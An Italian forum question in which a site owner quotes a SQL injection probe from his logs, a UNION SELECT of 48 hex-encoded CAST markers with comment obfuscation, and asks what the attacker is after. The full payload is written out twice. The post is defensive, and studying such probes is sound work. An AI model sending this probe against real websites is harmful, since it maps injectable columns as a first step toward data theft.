Il mio sito è stato ripetutamente colpito da questa query. Mi chiedo cosa l'attaccante sta cercando di ottenere? L'URL è:
my.site/content/page.aspx?myID=15641111111111111%20UNION%20SELECT%20cAsT(0x2d78312d512d%20as%20char),/**/cAsT(0x2d78322d512d%20as%20char),/**/cAsT(0x2d78332d512d%20as%20char),/**/cAsT(0x2d78342d512d%20as%20char),/**/cAsT(0x2d78352d512d%20as%20char),/**/cAsT(0x2d78362d512d%20as%20char),/**/cAsT(0x2d78372d512d%20as%20char),/**/cAsT(0x2d78382d512d%20as%20char),/**/cAsT(0x2d78392d512d%20as%20char),/**/cAsT(0x2d7831302d512d%20as%20char),/**/cAsT(0x2d7831312d512d%20as%20char),/**/cAsT(0x2d7831322d512d%20as%20char),/**/cAsT(0x2d7831332d512d%20as%20char),/**/cAsT(0x2d7831342d512d%20as%20char),/**/cAsT(0x2d7831352d512d%20as%20char),/**/cAsT(0x2d7831362d512d%20as%20char),/**/cAsT(0x2d7831372d512d%20as%20char),/**/cAsT(0x2d7831382d512d%20as%20char),/**/cAsT(0x2d7831392d512d%20as%20char),/**/cAsT(0x2d7832302d512d%20as%20char),/**/cAsT(0x2d7832312d512d%20as%20char),/**/cAsT(0x2d7832322d512d%20as%20char),/**/cAsT(0x2d7832332d512d%20as%20char),/**/cAsT(0x2d7832342d512d%20as%20char),/**/cAsT(0x2d7832352d512d%20as%20char),/**/cAsT(0x2d7832362d512d%20as%20char),/**/cAsT(0x2d7832372d512d%20as%20char),/**/cAsT(0x2d7832382d512d%20as%20char),/**/cAsT(0x2d7832392d512d%20as%20char),/**/cAsT(0x2d7833302d512d%20as%20char),/**/cAsT(0x2d7833312d512d%20as%20char),/**/cAsT(0x2d7833322d512d%20as%20char),/**/cAsT(0x2d7833332d512d%20as%20char),/**/cAsT(0x2d7833342d512d%20as%20char),/**/cAsT(0x2d7833352d512d%20as%20char),/**/cAsT(0x2d7833362d512d%20as%20char),/**/cAsT(0x2d7833372d512d%20as%20char),/**/cAsT(0x2d7833382d512d%20as%20char),/**/cAsT(0x2d7833392d512d%20as%20char),/**/cAsT(0x2d7834302d512d%20as%20char),/**/cAsT(0x2d7834312d512d%20as%20char),/**/cAsT(0x2d7834322d512d%20as%20char),/**/cAsT(0x2d7834332d512d%20as%20char),/**/cAsT(0x2d7834342d512d%20as%20char),/**/cAsT(0x2d7834352d512d%20as%20char),/**/cAsT(0x2d7834362d512d%20as%20char),/**/cAsT(0x2d7834372d512d%20as%20char),/**/cAsT(0x2d7834382d512d%20as%20char)--
I primi quattro numeri in myID
sono un ID legittimo. Dopo tutti quelli, è ovviamente un tentativo di iniezione SQL. Ecco come appare con %20
s sostituito con spazi e formattazione di base:
UNION
SELECT
cAsT(0x2d78312d512d as char),/**/
cAsT(0x2d78322d512d as char),/**/
cAsT(0x2d78332d512d as char),/**/
cAsT(0x2d78342d512d as char),/**/
cAsT(0x2d78352d512d as char),/**/
cAsT(0x2d78362d512d as char),/**/
cAsT(0x2d78372d512d as char),/**/
cAsT(0x2d78382d512d as char),/**/
cAsT(0x2d78392d512d as char),/**/
cAsT(0x2d7831302d512d as char),/**/
cAsT(0x2d7831312d512d as char),/**/
cAsT(0x2d7831322d512d as char),/**/
cAsT(0x2d7831332d512d as char),/**/
cAsT(0x2d7831342d512d as char),/**/
cAsT(0x2d7831352d512d as char),/**/
cAsT(0x2d7831362d512d as char),/**/
cAsT(0x2d7831372d512d as char),/**/
cAsT(0x2d7831382d512d as char),/**/
cAsT(0x2d7831392d512d as char),/**/
cAsT(0x2d7832302d512d as char),/**/
cAsT(0x2d7832312d512d as char),/**/
cAsT(0x2d7832322d512d as char),/**/
cAsT(0x2d7832332d512d as char),/**/
cAsT(0x2d7832342d512d as char),/**/
cAsT(0x2d7832352d512d as char),/**/
cAsT(0x2d7832362d512d as char),/**/
cAsT(0x2d7832372d512d as char),/**/
cAsT(0x2d7832382d512d as char),/**/
cAsT(0x2d7832392d512d as char),/**/
cAsT(0x2d7833302d512d as char),/**/
cAsT(0x2d7833312d512d as char),/**/
cAsT(0x2d7833322d512d as char),/**/
cAsT(0x2d7833332d512d as char),/**/
cAsT(0x2d7833342d512d as char),/**/
cAsT(0x2d7833352d512d as char),/**/
cAsT(0x2d7833362d512d as char),/**/
cAsT(0x2d7833372d512d as char),/**/
cAsT(0x2d7833382d512d as char),/**/
cAsT(0x2d7833392d512d as char),/**/
cAsT(0x2d7834302d512d as char),/**/
cAsT(0x2d7834312d512d as char),/**/
cAsT(0x2d7834322d512d as char),/**/
cAsT(0x2d7834332d512d as char),/**/
cAsT(0x2d7834342d512d as char),/**/
cAsT(0x2d7834352d512d as char),/**/
cAsT(0x2d7834362d512d as char),/**/
cAsT(0x2d7834372d512d as char),/**/
cAsT(0x2d7834382d512d as char)--
Quando eseguo questa query in SSMS, restituisce questo: Tutto il percorso attraverso -x48-Q-. Dato che questo non sta in realtà interrogando alcun dato, non posso pensare a ciò che l'attaccante spera di ottenere. Qualcuno ha mai visto qualcosa di simile prima d'ora?